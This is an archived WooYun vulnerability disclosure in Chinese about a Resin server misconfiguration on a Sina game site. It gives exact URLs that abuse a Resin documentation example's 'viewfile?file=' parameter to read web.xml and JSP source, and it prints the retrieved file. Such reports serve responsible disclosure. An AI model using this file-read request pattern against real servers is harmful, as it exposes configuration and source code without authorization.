乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2012-10-19: 细节已通知厂商并且等待厂商处理中 2012-10-19: 厂商已经确认,细节仅向厂商公开 2012-10-29: 细节向核心白帽子及相关领域专家公开 2012-11-08: 细节向普通白帽子公开 2012-11-18: 细节向实习白帽子公开 2012-12-03: 细节向公众公开
配置问题,可看源码
1.Resin
http://xbol.game.sina.cn/
2.读取配置文件
http://xbol.game.sina.cn//resin-doc/examples/ioc-periodictask/viewfile?file=WEB-INF/web.xml
3.源码
http://xbol.game.sina.cn//resin-doc/examples/ioc-periodictask/viewfile?file=admin/mbean.jsp
<html><head><title>admin/mbean.jsp</title><style type='text/css'> .code-highlight { color: #1764FF; } .face-xmlelement { color: #003DB8; font-weight: bold }</style></head><body bgcolor=white><b>admin/mbean.jsp</b><p><pre><%@ page session="false" import="javax.management.* com.caucho.jmx.Jmx java.util.*" %><%@ taglib uri="http://java.sun.com/jsp/jstl/core" prefix="c" %><% // stop browser from caching the page response.setHeader("Cache-Control","no-cache,post-check=0,pre-check=0,no-store"); response.setHeader("Pragma","no-cache"); response.setHeader("Expires","Thu,01Dec199416:00:00GMT"); // refresh every 5 seconds response.setHeader("refresh","5"); // prepare objects ObjectName query = new ObjectName("resin:type=PeriodicTask,*"); pageContext.setAttribute("mbeans",Jmx.query(query));%><html><head><title>mbean</title></head><body><h1>mbean</h1>This page is automatically refreshed every 5 seconds.<c:forEach var="mbean" items="${mbeans}"><hr/><dl><dt>estimatedAverageTime<dd>${mbean.estimatedAverageTime}<dt>active<dd>${mbean.active}<dt>estimatedTimeRemaining<dd>${mbean.estimatedTimeRemaining}<dt>lastActiveTime<dd>${mbean.lastActiveTime}<dt>totalActiveCount<dd>${mbean.totalActiveCount}<dt>totalActiveTime<dd>${mbean.totalActiveTime}<dt>averageActiveTime<dd>${mbean.averageActiveTime}</dl></c:forEach><hr/></body></html></pre></body></html>
....
危害等级:低
漏洞Rank:1
确认时间:2012-10-19 14:22
多谢。
暂无